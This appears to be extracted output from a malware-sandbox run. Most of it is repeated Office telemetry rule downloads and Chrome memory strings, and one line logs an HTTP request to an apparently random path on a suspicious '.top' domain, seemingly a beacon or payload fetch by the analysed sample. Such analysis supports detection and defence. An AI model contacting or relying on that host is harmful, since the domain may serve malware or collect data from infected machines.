Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4178816616.00001D4000298000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 2,"window_count":0},{"crashed":false,"time":"13340886960923866","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340886965177921","type":2,"window_count":1},{"crashed":false,"time":"13340890857002147","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890857032656","type":2,"window_count":0},{"crashed":false,"time":"13340890860222296","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890860225507","type":2,"window_count":0},{"crashed":false,"time":"13340890862208495","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890862220490","type":2,"window_count":0},{"crashed":false,"time":"13340890863779969","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890863788194","type":2,"window_count":0},{"crashed":false,"time":"13340890865410306","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890865434464","type":2,"window_count":0},{"crashed":false,"time":"13340890867575477","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890867600785","type":2,"window_count":0},{"crashed":false,"time":"13376950569281988","type":0}],"session_data_status":1},"settings":{"a11y":{"apply_page_colors_only_on_increased_contrast":true}},"signin":{"allowed":true},"spellcheck":{"dictionaries":["en-US"],"dictionary":""},"supervised_user":{"metrics":{"day_id":154825}},"sync":{"autofill_wallet_import_enabled_migrated":true,"requested":false},"translate_site_blacklist":[],"translate_site_blocklist_with_time":{},"updateclientdata":{"apps":{"ghbmnnjooekpmoecnnnilnnbdlolhkhi":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"e8cfbc86-35d0-4127-9614-1b5020b1c2a0"},"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?u equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.4180753767.00001D40006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4180753767.00001D40006F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
